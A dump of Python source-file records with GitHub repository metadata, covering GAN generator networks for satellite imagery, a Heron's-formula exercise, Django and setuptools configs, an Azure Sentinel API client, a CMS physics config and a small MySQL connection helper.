Dataset schema (column, type, and value range; nullable columns are marked):

| Column | Type | Values |
|---|---|---|
| hexsha | string | lengths 40–40 |
| size | int64 | 1–1.03M |
| ext | string | 10 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | lengths 3–239 |
| max_stars_repo_name | string | lengths 5–130 |
| max_stars_repo_head_hexsha | string | lengths 40–78 |
| max_stars_repo_licenses | list | lengths 1–10 |
| max_stars_count | int64 | 1–191k, nullable |
| max_stars_repo_stars_event_min_datetime | string | lengths 24–24, nullable |
| max_stars_repo_stars_event_max_datetime | string | lengths 24–24, nullable |
| max_issues_repo_path | string | lengths 3–239 |
| max_issues_repo_name | string | lengths 5–130 |
| max_issues_repo_head_hexsha | string | lengths 40–78 |
| max_issues_repo_licenses | list | lengths 1–10 |
| max_issues_count | int64 | 1–67k, nullable |
| max_issues_repo_issues_event_min_datetime | string | lengths 24–24, nullable |
| max_issues_repo_issues_event_max_datetime | string | lengths 24–24, nullable |
| max_forks_repo_path | string | lengths 3–239 |
| max_forks_repo_name | string | lengths 5–130 |
| max_forks_repo_head_hexsha | string | lengths 40–78 |
| max_forks_repo_licenses | list | lengths 1–10 |
| max_forks_count | int64 | 1–105k, nullable |
| max_forks_repo_forks_event_min_datetime | string | lengths 24–24, nullable |
| max_forks_repo_forks_event_max_datetime | string | lengths 24–24, nullable |
| content | string | lengths 1–1.03M |
| avg_line_length | float64 | 1–958k |
| max_line_length | int64 | 1–1.03M |
| alphanum_fraction | float64 | 0–1 |

Each record below lists the row metadata, then the file `content`, then the per-file statistics.

hexsha: 794e12b7a8a7f3219aaa8282ecd50af508712999 | size: 1,392 | ext: py | lang: Python
max_stars: macrodensity/__init__.py | Zarand3r/MacroDensity | dc1afd60e2c3e8f6f81ef0cad85619bc1469c7ea | ["MIT"] | count: 57 | 2016-09-19T21:40:30.000Z – 2022-02-24T03:39:51.000Z
max_issues: macrodensity/__init__.py | Zarand3r/MacroDensity | dc1afd60e2c3e8f6f81ef0cad85619bc1469c7ea | ["MIT"] | count: 21 | 2017-05-25T03:15:31.000Z – 2021-11-04T16:08:18.000Z
max_forks: macrodensity/__init__.py | Zarand3r/MacroDensity | dc1afd60e2c3e8f6f81ef0cad85619bc1469c7ea | ["MIT"] | count: 29 | 2016-04-11T02:01:08.000Z – 2022-01-24T21:22:06.000Z
content:
###############################################################################
# Copyright Keith Butler(2014) #
# #
# This file MacroDensity.__init__.py is free software: you can #
# redistribute it and/or modify it under the terms of the GNU General Public #
# License as published by the Free Software Foundation, either version 3 of #
# the License, or (at your option) any later version. #
# This program is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for #
# more details. #
# You should have received a copy of the GNU General Public License along with#
# this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
import numpy
import numpy as np
import math
from scipy import interpolate
from macrodensity import vasp_tools
from macrodensity import plotting_tools
from macrodensity.density_tools import *
avg_line_length: 58 | max_line_length: 79 | alphanum_fraction: 0.498563

hexsha: 794e13a475f041a82d733bbdc9e85698e4c514fa | size: 15,454 | ext: py | lang: Python
max_stars: satflow/models/gan/generators.py | mfrasco/satflow | 2e56b46dfd81a05670c6d2b1bda8c9eec38301a7 | ["MIT"] | count: null | dates: null
max_issues: satflow/models/gan/generators.py | mfrasco/satflow | 2e56b46dfd81a05670c6d2b1bda8c9eec38301a7 | ["MIT"] | count: null | dates: null
max_forks: satflow/models/gan/generators.py | mfrasco/satflow | 2e56b46dfd81a05670c6d2b1bda8c9eec38301a7 | ["MIT"] | count: null | dates: null
content:
import functools
import torch
from torch import nn as nn
from typing import Union
from satflow.models.gan.common import get_norm_layer, init_net
from satflow.models.utils import get_conv_layer
import antialiased_cnns
def define_generator(
input_nc,
output_nc,
ngf,
netG: Union[str, torch.nn.Module],
norm="batch",
use_dropout=False,
init_type="normal",
init_gain=0.02,
):
"""Create a generator
Parameters:
input_nc (int) -- the number of channels in input images
output_nc (int) -- the number of channels in output images
ngf (int) -- the number of filters in the last conv layer
netG (str) -- the architecture's name: resnet_9blocks | resnet_6blocks | unet_256 | unet_128
norm (str) -- the name of normalization layers used in the network: batch | instance | none
use_dropout (bool) -- if use dropout layers.
init_type (str) -- the name of our initialization method.
init_gain (float) -- scaling factor for normal, xavier and orthogonal.
Returns a generator
Our current implementation provides two types of generators:
U-Net: [unet_128] (for 128x128 input images) and [unet_256] (for 256x256 input images)
The original U-Net paper: https://arxiv.org/abs/1505.04597
Resnet-based generator: [resnet_6blocks] (with 6 Resnet blocks) and [resnet_9blocks] (with 9 Resnet blocks)
Resnet-based generator consists of several Resnet blocks between a few downsampling/upsampling operations.
We adapt Torch code from Justin Johnson's neural style transfer project (https://github.com/jcjohnson/fast-neural-style).
The generator has been initialized by <init_net>. It uses RELU for non-linearity.
"""
net = None
norm_layer = get_norm_layer(norm_type=norm)
if isinstance(netG, torch.nn.Module):
net = netG
elif netG == "resnet_9blocks":
net = ResnetGenerator(
input_nc, output_nc, ngf, norm_layer=norm_layer, use_dropout=use_dropout, n_blocks=9
)
elif netG == "resnet_6blocks":
net = ResnetGenerator(
input_nc, output_nc, ngf, norm_layer=norm_layer, use_dropout=use_dropout, n_blocks=6
)
elif netG == "unet_128":
net = UnetGenerator(
input_nc, output_nc, 7, ngf, norm_layer=norm_layer, use_dropout=use_dropout
)
elif netG == "unet_256":
net = UnetGenerator(
input_nc, output_nc, 8, ngf, norm_layer=norm_layer, use_dropout=use_dropout
)
else:
raise NotImplementedError("Generator model name [%s] is not recognized" % netG)
return init_net(net, init_type, init_gain)
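# A minimal usage sketch for the factory above (an assumption-laden example, not
# taken from this repo: it presumes 3-channel images and the default init args;
# `torch` is already imported at the top of this module):
#
#   netG = define_generator(input_nc=3, output_nc=3, ngf=64,
#                           netG="resnet_9blocks", norm="instance")
#   fake = netG(torch.randn(1, 3, 256, 256))  # -> shape (1, 3, 256, 256), values in [-1, 1]
#
# The ResNet variant downsamples twice and upsamples twice, so the output keeps
# the input resolution; the final Tanh bounds the output range.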
class ResnetGenerator(nn.Module):
"""Resnet-based generator that consists of Resnet blocks between a few downsampling/upsampling operations.
We adapt Torch code and idea from Justin Johnson's neural style transfer project(https://github.com/jcjohnson/fast-neural-style)
"""
def __init__(
self,
input_nc,
output_nc,
ngf=64,
norm_layer=nn.BatchNorm2d,
use_dropout=False,
n_blocks=6,
padding_type="reflect",
conv_type: str = "standard",
):
"""Construct a Resnet-based generator
Parameters:
input_nc (int) -- the number of channels in input images
output_nc (int) -- the number of channels in output images
ngf (int) -- the number of filters in the last conv layer
norm_layer -- normalization layer
use_dropout (bool) -- if use dropout layers
n_blocks (int) -- the number of ResNet blocks
padding_type (str) -- the name of padding layer in conv layers: reflect | replicate | zero
"""
assert n_blocks >= 0
super(ResnetGenerator, self).__init__()
if type(norm_layer) == functools.partial:
use_bias = norm_layer.func == nn.InstanceNorm2d
else:
use_bias = norm_layer == nn.InstanceNorm2d
conv2d = get_conv_layer(conv_type)
model = [
nn.ReflectionPad2d(3),
conv2d(input_nc, ngf, kernel_size=7, padding=0, bias=use_bias),
norm_layer(ngf),
nn.ReLU(True),
]
n_downsampling = 2
for i in range(n_downsampling): # add downsampling layers
mult = 2 ** i
if conv_type == "antialiased":
block = [
conv2d(
ngf * mult,
ngf * mult * 2,
kernel_size=3,
stride=1,
padding=1,
bias=use_bias,
),
norm_layer(ngf * mult * 2),
nn.ReLU(True),
antialiased_cnns.BlurPool(ngf * mult * 2, stride=2),
]
else:
block = [
conv2d(
ngf * mult,
ngf * mult * 2,
kernel_size=3,
stride=2,
padding=1,
bias=use_bias,
),
norm_layer(ngf * mult * 2),
nn.ReLU(True),
]
model += block
mult = 2 ** n_downsampling
for i in range(n_blocks): # add ResNet blocks
model += [
ResnetBlock(
ngf * mult,
padding_type=padding_type,
norm_layer=norm_layer,
use_dropout=use_dropout,
use_bias=use_bias,
)
]
for i in range(n_downsampling): # add upsampling layers
mult = 2 ** (n_downsampling - i)
model += [
nn.ConvTranspose2d(
ngf * mult,
int(ngf * mult / 2),
kernel_size=3,
stride=2,
padding=1,
output_padding=1,
bias=use_bias,
),
norm_layer(int(ngf * mult / 2)),
nn.ReLU(True),
]
model += [nn.ReflectionPad2d(3)]
model += [nn.Conv2d(ngf, output_nc, kernel_size=7, padding=0)]
model += [nn.Tanh()]
self.model = nn.Sequential(*model)
def forward(self, input):
"""Standard forward"""
return self.model(input)
class ResnetBlock(nn.Module):
"""Define a Resnet block"""
def __init__(
self, dim, padding_type, norm_layer, use_dropout, use_bias, conv_type: str = "standard"
):
"""Initialize the Resnet block
A resnet block is a conv block with skip connections
We construct a conv block with build_conv_block function,
and implement skip connections in <forward> function.
Original Resnet paper: https://arxiv.org/pdf/1512.03385.pdf
"""
super(ResnetBlock, self).__init__()
conv2d = get_conv_layer(conv_type)
self.conv_block = self.build_conv_block(
dim, padding_type, norm_layer, use_dropout, use_bias, conv2d
)
def build_conv_block(
self, dim, padding_type, norm_layer, use_dropout, use_bias, conv2d: torch.nn.Module
):
"""Construct a convolutional block.
Parameters:
dim (int) -- the number of channels in the conv layer.
padding_type (str) -- the name of padding layer: reflect | replicate | zero
norm_layer -- normalization layer
use_dropout (bool) -- if use dropout layers.
use_bias (bool) -- if the conv layer uses bias or not
Returns a conv block (with a conv layer, a normalization layer, and a non-linearity layer (ReLU))
"""
conv_block = []
p = 0
if padding_type == "reflect":
conv_block += [nn.ReflectionPad2d(1)]
elif padding_type == "replicate":
conv_block += [nn.ReplicationPad2d(1)]
elif padding_type == "zero":
p = 1
else:
raise NotImplementedError("padding [%s] is not implemented" % padding_type)
conv_block += [
conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias),
norm_layer(dim),
nn.ReLU(True),
]
if use_dropout:
conv_block += [nn.Dropout(0.5)]
p = 0
if padding_type == "reflect":
conv_block += [nn.ReflectionPad2d(1)]
elif padding_type == "replicate":
conv_block += [nn.ReplicationPad2d(1)]
elif padding_type == "zero":
p = 1
else:
raise NotImplementedError("padding [%s] is not implemented" % padding_type)
conv_block += [
conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias),
norm_layer(dim),
]
return nn.Sequential(*conv_block)
def forward(self, x):
"""Forward function (with skip connections)"""
out = x + self.conv_block(x) # add skip connections
return out
class UnetGenerator(nn.Module):
"""Create a Unet-based generator"""
def __init__(
self,
input_nc,
output_nc,
num_downs,
ngf=64,
norm_layer=nn.BatchNorm2d,
use_dropout=False,
conv_type: str = "standard",
):
"""Construct a Unet generator
Parameters:
input_nc (int) -- the number of channels in input images
output_nc (int) -- the number of channels in output images
            num_downs (int) -- the number of downsamplings in UNet. For example, if |num_downs| == 7,
                               an image of size 128x128 will become of size 1x1 at the bottleneck
ngf (int) -- the number of filters in the last conv layer
norm_layer -- normalization layer
We construct the U-Net from the innermost layer to the outermost layer.
It is a recursive process.
"""
super(UnetGenerator, self).__init__()
# construct unet structure
unet_block = UnetSkipConnectionBlock(
ngf * 8,
ngf * 8,
input_nc=None,
submodule=None,
norm_layer=norm_layer,
innermost=True,
conv_type=conv_type,
) # add the innermost layer
for i in range(num_downs - 5): # add intermediate layers with ngf * 8 filters
unet_block = UnetSkipConnectionBlock(
ngf * 8,
ngf * 8,
input_nc=None,
submodule=unet_block,
norm_layer=norm_layer,
use_dropout=use_dropout,
conv_type=conv_type,
)
# gradually reduce the number of filters from ngf * 8 to ngf
unet_block = UnetSkipConnectionBlock(
ngf * 4,
ngf * 8,
input_nc=None,
submodule=unet_block,
norm_layer=norm_layer,
conv_type=conv_type,
)
unet_block = UnetSkipConnectionBlock(
ngf * 2,
ngf * 4,
input_nc=None,
submodule=unet_block,
norm_layer=norm_layer,
conv_type=conv_type,
)
unet_block = UnetSkipConnectionBlock(
ngf,
ngf * 2,
input_nc=None,
submodule=unet_block,
norm_layer=norm_layer,
conv_type=conv_type,
)
self.model = UnetSkipConnectionBlock(
output_nc,
ngf,
input_nc=input_nc,
submodule=unet_block,
outermost=True,
norm_layer=norm_layer,
conv_type=conv_type,
) # add the outermost layer
def forward(self, input):
"""Standard forward"""
return self.model(input)
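# A small shape sketch for the recursive construction above (hypothetical sizes,
# matching the num_downs == 7 example in the docstring):
#
#   unet = UnetGenerator(input_nc=1, output_nc=1, num_downs=7)
#   y = unet(torch.randn(1, 1, 128, 128))  # bottleneck reaches 1x1; y has shape (1, 1, 128, 128)
#
# Each UnetSkipConnectionBlock halves the spatial size on the way down, doubles
# it on the way up, and concatenates the skip tensor along the channel dimension.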
class UnetSkipConnectionBlock(nn.Module):
"""Defines the Unet submodule with skip connection.
X -------------------identity----------------------
|-- downsampling -- |submodule| -- upsampling --|
"""
def __init__(
self,
outer_nc,
inner_nc,
input_nc=None,
submodule=None,
outermost=False,
innermost=False,
norm_layer=nn.BatchNorm2d,
use_dropout=False,
conv_type: str = "standard",
):
"""Construct a Unet submodule with skip connections.
Parameters:
outer_nc (int) -- the number of filters in the outer conv layer
inner_nc (int) -- the number of filters in the inner conv layer
input_nc (int) -- the number of channels in input images/features
submodule (UnetSkipConnectionBlock) -- previously defined submodules
outermost (bool) -- if this module is the outermost module
innermost (bool) -- if this module is the innermost module
norm_layer -- normalization layer
use_dropout (bool) -- if use dropout layers.
"""
super(UnetSkipConnectionBlock, self).__init__()
self.outermost = outermost
if type(norm_layer) == functools.partial:
use_bias = norm_layer.func == nn.InstanceNorm2d
else:
use_bias = norm_layer == nn.InstanceNorm2d
if input_nc is None:
input_nc = outer_nc
conv2d = get_conv_layer(conv_type)
if conv_type == "antialiased":
antialiased = True
downconv = conv2d(input_nc, inner_nc, kernel_size=4, stride=1, padding=1, bias=use_bias)
blurpool = antialiased_cnns.BlurPool(inner_nc, stride=2)
else:
antialiased = False
downconv = conv2d(input_nc, inner_nc, kernel_size=4, stride=2, padding=1, bias=use_bias)
downrelu = nn.LeakyReLU(0.2, True)
downnorm = norm_layer(inner_nc)
uprelu = nn.ReLU(True)
upnorm = norm_layer(outer_nc)
if outermost:
upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc, kernel_size=4, stride=2, padding=1)
down = [downconv]
up = [uprelu, upconv, nn.Tanh()]
model = down + [submodule] + up
elif innermost:
upconv = nn.ConvTranspose2d(
inner_nc, outer_nc, kernel_size=4, stride=2, padding=1, bias=use_bias
)
down = [downrelu, downconv, blurpool] if antialiased else [downrelu, downconv]
up = [uprelu, upconv, upnorm]
model = down + up
else:
upconv = nn.ConvTranspose2d(
inner_nc * 2, outer_nc, kernel_size=4, stride=2, padding=1, bias=use_bias
)
down = (
[downrelu, downconv, downnorm, blurpool]
if antialiased
else [downrelu, downconv, downnorm]
)
up = [uprelu, upconv, upnorm]
if use_dropout:
model = down + [submodule] + up + [nn.Dropout(0.5)]
else:
model = down + [submodule] + up
self.model = nn.Sequential(*model)
def forward(self, x):
if self.outermost:
return self.model(x)
else: # add skip connections
return torch.cat([x, self.model(x)], 1)
avg_line_length: 35.939535 | max_line_length: 132 | alphanum_fraction: 0.55662

hexsha: 794e14e160852403b6dfeb22aed50ef6d8b97635 | size: 532 | ext: py | lang: Python
max_stars: Taller Estructura Control Secuencial/Ejercicio_8.py | DiegoC386/Algoritmos_Diego | bb22b765ca15cb6ced5e3daae45cec300c421c18 | ["MIT"] | count: null | dates: null
max_issues: Taller Estructura Control Secuencial/Ejercicio_8.py | DiegoC386/Algoritmos_Diego | bb22b765ca15cb6ced5e3daae45cec300c421c18 | ["MIT"] | count: null | dates: null
max_forks: Taller Estructura Control Secuencial/Ejercicio_8.py | DiegoC386/Algoritmos_Diego | bb22b765ca15cb6ced5e3daae45cec300c421c18 | ["MIT"] | count: null | dates: null
content:
"""
Entradas
LongitudLado1-->float-->Lado1
LongitudLado2-->float-->Lado2
LongitudLado3-->float-->Lado3
Salidas
Semiperimetro-->float-->S
Area-->float-->A
"""
import math
# INPUT
Lado1=float(input("Ingrese la longitud del primer lado: "))
Lado2=float(input("Ingrese la longitud del segundo lado: "))
Lado3=float(input("Ingrese la longitud del tercer lado: "))
# BLACK BOX (processing)
S=(Lado1+Lado2+Lado3)/2
A=math.sqrt(S*(S-Lado1)*(S-Lado2)*(S-Lado3))
print("El Semiperimetro es: "+str(S))
print("El Area del triangulo es: "+"{:.3f}".format(A))
avg_line_length: 28 | max_line_length: 60 | alphanum_fraction: 0.714286

hexsha: 794e15eb8b5e789f522fcade043e284c5f706f1b | size: 792 | ext: py | lang: Python
max_stars: core/urls.py | nixonsparrow/BookWorm | 0248334e4b5a40e9faad5ec485e1a0abbdfe0c7a | ["Apache-2.0"] | count: 1 | 2022-01-17T17:47:26.000Z – 2022-01-17T17:47:26.000Z
max_issues: core/urls.py | nixonsparrow/BookWorm | 0248334e4b5a40e9faad5ec485e1a0abbdfe0c7a | ["Apache-2.0"] | count: 1 | 2022-01-17T19:23:19.000Z – 2022-01-17T19:23:19.000Z
max_forks: core/urls.py | nixonsparrow/BookWorm | 0248334e4b5a40e9faad5ec485e1a0abbdfe0c7a | ["Apache-2.0"] | count: null | dates: null
content:
"""core URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/4.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('books.urls')),
]
avg_line_length: 34.434783 | max_line_length: 77 | alphanum_fraction: 0.700758

hexsha: 794e163f3b2a7bd7df34b5370d68695cfedd93cd | size: 1,560 | ext: py | lang: Python
max_stars: python/setup.py | yasushi-saito/wslink | 25c7d3b2f6da25b100bc69efa4e06b1defe22ca1 | ["BSD-3-Clause"] | count: null | dates: null
max_issues: python/setup.py | yasushi-saito/wslink | 25c7d3b2f6da25b100bc69efa4e06b1defe22ca1 | ["BSD-3-Clause"] | count: null | dates: null
max_forks: python/setup.py | yasushi-saito/wslink | 25c7d3b2f6da25b100bc69efa4e06b1defe22ca1 | ["BSD-3-Clause"] | count: null | dates: null
content:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
# import shutil
import sys
# import itertools
from setuptools import setup, find_packages
# from setuptools.command.install import install
# from distutils.dir_util import copy_tree
readme = ""
with open("README.rst") as f:
readme = f.read()
setup(
name="wslinklc",
description="Python/JavaScript library for communicating over WebSocket, with workarounds to publish messages synchronously, by Luminary",
long_description=readme,
author="Kitware, Inc.",
author_email="kitware@kitware.com",
url="https://github.com/kitware/wslink",
license="BSD-3-Clause",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Web Environment",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Topic :: Software Development :: Libraries :: Python Modules",
],
keywords="websocket javascript rpc pubsub",
packages=find_packages("src", exclude=("tests.*", "tests")),
package_dir={"": "src"},
install_requires=["aiohttp"],
)
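# A short usage note (assuming a standard setuptools workflow; the commands below
# are not part of this file):
#
#   pip install .       # install the package from this directory
#   python -m build     # build an sdist/wheel (needs the third-party 'build' package)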
avg_line_length: 31.2 | max_line_length: 142 | alphanum_fraction: 0.64359

hexsha: 794e166be9c5ab201424284bbe3f990d7b13fd11 | size: 491 | ext: py | lang: Python
max_stars: data/scripts/templates/object/tangible/ship/crafted/booster/shared_fast_charge_fuel_cell_mk3.py | obi-two/GameServer | 7d37024e2291a97d49522610cd8f1dbe5666afc2 | ["MIT"] | count: 20 | 2015-02-23T15:11:56.000Z – 2022-03-18T20:56:48.000Z
max_issues: data/scripts/templates/object/tangible/ship/crafted/booster/shared_fast_charge_fuel_cell_mk3.py | apathyboy/swganh | 665128efe9154611dec4cb5efc61d246dd095984 | ["MIT"] | count: null | dates: null
max_forks: data/scripts/templates/object/tangible/ship/crafted/booster/shared_fast_charge_fuel_cell_mk3.py | apathyboy/swganh | 665128efe9154611dec4cb5efc61d246dd095984 | ["MIT"] | count: 20 | 2015-04-04T16:35:59.000Z – 2022-03-24T14:54:37.000Z
content:
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/ship/crafted/booster/shared_fast_charge_fuel_cell_mk3.iff"
result.attribute_template_id = 8
result.stfName("space_crafting_n","fast_charge_fuel_cell_mk3")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
avg_line_length: 28.882353 | max_line_length: 94 | alphanum_fraction: 0.749491

hexsha: 794e16ae16a01b502f2df02442672a0f17f125c9 | size: 5,651 | ext: py | lang: Python
max_stars: src/sentinel/azext_sentinel/vendored_sdks/security_insights/operations/comments_operations.py | hpsan/azure-cli-extensions | be1589bb6dd23837796e088d28e65e873050171e | ["MIT"] | count: null | dates: null
max_issues: src/sentinel/azext_sentinel/vendored_sdks/security_insights/operations/comments_operations.py | hpsan/azure-cli-extensions | be1589bb6dd23837796e088d28e65e873050171e | ["MIT"] | count: null | dates: null
max_forks: src/sentinel/azext_sentinel/vendored_sdks/security_insights/operations/comments_operations.py | hpsan/azure-cli-extensions | be1589bb6dd23837796e088d28e65e873050171e | ["MIT"] | count: 1 | 2020-07-16T23:49:49.000Z – 2020-07-16T23:49:49.000Z
content:
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from .. import models
class CommentsOperations(object):
"""CommentsOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: API version for the operation. Constant value: "2019-01-01-preview".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
self.api_version = "2019-01-01-preview"
def list_by_case(
self, resource_group_name, operational_insights_resource_provider, workspace_name, case_id, filter=None, orderby=None, top=None, skip_token=None, custom_headers=None, raw=False, **operation_config):
"""Gets all case comments.
:param resource_group_name: The name of the resource group within the
user's subscription. The name is case insensitive.
:type resource_group_name: str
:param operational_insights_resource_provider: The namespace of
workspaces resource provider- Microsoft.OperationalInsights.
:type operational_insights_resource_provider: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param case_id: Case ID
:type case_id: str
:param filter: Filters the results, based on a Boolean condition.
Optional.
:type filter: str
:param orderby: Sorts the results. Optional.
:type orderby: str
:param top: Returns only the first n results. Optional.
:type top: int
:param skip_token: Skiptoken is only used if a previous operation
returned a partial result. If a previous response contains a nextLink
element, the value of the nextLink element will include a skiptoken
parameter that specifies a starting point to use for subsequent calls.
Optional.
:type skip_token: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: CaseCommentList or ClientRawResponse if raw=true
:rtype: ~securityinsights.models.CaseCommentList or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`CloudErrorException<securityinsights.models.CloudErrorException>`
"""
# Construct URL
url = self.list_by_case.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str', pattern=r'^[0-9A-Fa-f]{8}-([0-9A-Fa-f]{4}-){3}[0-9A-Fa-f]{12}$'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'operationalInsightsResourceProvider': self._serialize.url("operational_insights_resource_provider", operational_insights_resource_provider, 'str'),
'workspaceName': self._serialize.url("workspace_name", workspace_name, 'str', max_length=90, min_length=1),
'caseId': self._serialize.url("case_id", case_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query("top", top, 'int')
if skip_token is not None:
query_parameters['$skipToken'] = self._serialize.query("skip_token", skip_token, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CloudErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CaseCommentList', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
list_by_case.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{operationalInsightsResourceProvider}/workspaces/{workspaceName}/providers/Microsoft.SecurityInsights/cases/{caseId}/comments'}
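# A hedged usage sketch (hypothetical values; this operations class is normally
# reached through the generated SecurityInsights client, assumed here to expose
# it as `client.comments`):
#
#   comments = client.comments.list_by_case(
#       resource_group_name="my-rg",
#       operational_insights_resource_provider="Microsoft.OperationalInsights",
#       workspace_name="my-workspace",
#       case_id="00000000-0000-0000-0000-000000000000",
#       top=50)
#   # -> CaseCommentList (or ClientRawResponse when raw=True)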
avg_line_length: 47.487395 | max_line_length: 241 | alphanum_fraction: 0.668554

hexsha: 794e16b975142922d7dcc1b1c516bfe2b1090f7e | size: 500 | ext: py | lang: Python
max_stars: RecoTauTag/RecoTau/python/PFRecoTauDiscriminationByIsolationUsingLeadingPion_cfi.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | ["Apache-2.0"] | count: 3 | 2018-08-24T19:10:26.000Z – 2019-02-19T11:45:32.000Z
max_issues: RecoTauTag/RecoTau/python/PFRecoTauDiscriminationByIsolationUsingLeadingPion_cfi.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | ["Apache-2.0"] | count: 3 | 2018-08-23T13:40:24.000Z – 2019-12-05T21:16:03.000Z
max_forks: RecoTauTag/RecoTau/python/PFRecoTauDiscriminationByIsolationUsingLeadingPion_cfi.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | ["Apache-2.0"] | count: 5 | 2018-08-21T16:37:52.000Z – 2020-01-09T13:33:17.000Z
content:
import FWCore.ParameterSet.Config as cms
import copy
from RecoTauTag.RecoTau.PFRecoTauDiscriminationByIsolation_cfi import pfRecoTauDiscriminationByIsolation
from RecoTauTag.RecoTau.TauDiscriminatorTools import requireLeadPion
pfRecoTauDiscriminationByIsolationUsingLeadingPion = copy.deepcopy(pfRecoTauDiscriminationByIsolation)
# Require a lead pion (charged OR neutral) instead of strictly a leading track
pfRecoTauDiscriminationByIsolationUsingLeadingPion.Prediscriminants = requireLeadPion
avg_line_length: 41.666667 | max_line_length: 105 | alphanum_fraction: 0.892

hexsha: 794e16eb28d32f4b7ab0992ea30b6080991ffc77 | size: 141 | ext: py | lang: Python
max_stars: lib/db.py | hygoni/CNUNotifier | 964a7b080ab3ec1caa3769d4c5b164fbae5161ba | ["MIT"] | count: 4 | 2019-08-13T12:09:25.000Z – 2021-05-29T15:33:55.000Z
max_issues: lib/db.py | hygoni/CNUNotifier | 964a7b080ab3ec1caa3769d4c5b164fbae5161ba | ["MIT"] | count: 1 | 2019-08-18T07:59:54.000Z – 2019-08-19T12:20:45.000Z
max_forks: lib/db.py | hygoni/CNUNotifier | 964a7b080ab3ec1caa3769d4c5b164fbae5161ba | ["MIT"] | count: 1 | 2019-08-10T10:32:42.000Z – 2019-08-10T10:32:42.000Z
content:
import pymysql
def getConn():
conn = pymysql.connect(host='localhost', user='cnunoti', password='cnunoti', db='cnunoti')
return conn
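# A minimal usage sketch (assuming the credentials above are valid on localhost):
#
#   conn = getConn()
#   try:
#       with conn.cursor() as cur:
#           cur.execute("SELECT 1")
#           print(cur.fetchone())
#   finally:
#       conn.close()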
avg_line_length: 23.5 | max_line_length: 92 | alphanum_fraction: 0.702128

hexsha: 794e179f841bd8c4954241cef2dbc4f62f132d8e | size: 6,166 | ext: py | lang: Python
max_stars: env/lib/python3.8/site-packages/plotly/graph_objs/volume/slices/_y.py | acrucetta/Chicago_COVI_WebApp | a37c9f492a20dcd625f8647067394617988de913 | ["MIT", "Unlicense"] | count: 11,750 | 2015-10-12T07:03:39.000Z – 2022-03-31T20:43:15.000Z
max_issues: env/lib/python3.8/site-packages/plotly/graph_objs/volume/slices/_y.py | acrucetta/Chicago_COVI_WebApp | a37c9f492a20dcd625f8647067394617988de913 | ["MIT", "Unlicense"] | count: 2,951 | 2015-10-12T00:41:25.000Z – 2022-03-31T22:19:26.000Z
max_forks: env/lib/python3.8/site-packages/plotly/graph_objs/volume/slices/_y.py | acrucetta/Chicago_COVI_WebApp | a37c9f492a20dcd625f8647067394617988de913 | ["MIT", "Unlicense"] | count: 2,623 | 2015-10-15T14:40:27.000Z – 2022-03-28T16:05:50.000Z
content:
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
